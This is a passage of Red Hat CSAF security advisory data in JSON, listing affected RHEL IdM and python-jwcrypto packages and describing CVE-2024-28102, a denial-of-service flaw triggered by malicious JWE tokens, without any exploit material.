"products": [
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0.6.0-3.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-4.9.13-9.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-4.9.13-9.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19692+fac39a03.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0.12-3.module+el8.9.0+19692+fac39a03.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-dns-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-5.1-12.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaserver-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipatests-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "python-jwcrypto: malicious JWE token can cause denial of service"
}
]
}
rhsa-2024:2559
Vulnerability from csaf_redhat
Notes
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for python-jwcrypto is now available for Red Hat Enterprise Linux 9.",
"title": "Topic"
},
{
"category": "general",
"text": "The python-jwcrypto package provides Python implementations of the JSON Web Key (JWK), JSON Web Signature (JWS), JSON Web Encryption (JWE), and JSON Web Token (JWT) JOSE (JSON Object Signing and Encryption) standards.\n\nSecurity Fix(es):\n\n* python-jwcrypto: malicious JWE token can cause denial of service (CVE-2024-28102)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:2559",
"url": "https://access.redhat.com/errata/RHSA-2024:2559"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#moderate",
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"category": "external",
"summary": "2268758",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268758"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_2559.json"
}
],
"title": "Red Hat Security Advisory: python-jwcrypto security update",
"tracking": {
"current_release_date": "2025-09-25T13:09:16+00:00",
"generator": {
"date": "2025-09-25T13:09:16+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.6.8"
}
},
"id": "RHSA-2024:2559",
"initial_release_date": "2024-04-30T13:36:16+00:00",
"revision_history": [
{
"date": "2024-04-30T13:36:16+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-04-30T13:36:16+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2025-09-25T13:09:16+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream (v. 9)",
"product": {
"name": "Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.4.0.Z.MAIN.EUS",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:enterprise_linux:9::appstream"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "python-jwcrypto-0:0.8-5.el9_4.src",
"product": {
"name": "python-jwcrypto-0:0.8-5.el9_4.src",
"product_id": "python-jwcrypto-0:0.8-5.el9_4.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-jwcrypto@0.8-5.el9_4?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "python3-jwcrypto-0:0.8-5.el9_4.noarch",
"product": {
"name": "python3-jwcrypto-0:0.8-5.el9_4.noarch",
"product_id": "python3-jwcrypto-0:0.8-5.el9_4.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-jwcrypto@0.8-5.el9_4?arch=noarch"
}
}
}
],
"category": "architecture",
"name": "noarch"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "python-jwcrypto-0:0.8-5.el9_4.src as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.4.0.Z.MAIN.EUS:python-jwcrypto-0:0.8-5.el9_4.src"
},
"product_reference": "python-jwcrypto-0:0.8-5.el9_4.src",
"relates_to_product_reference": "AppStream-9.4.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-jwcrypto-0:0.8-5.el9_4.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.4.0.Z.MAIN.EUS:python3-jwcrypto-0:0.8-5.el9_4.noarch"
},
"product_reference": "python3-jwcrypto-0:0.8-5.el9_4.noarch",
"relates_to_product_reference": "AppStream-9.4.0.Z.MAIN.EUS"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-28102",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
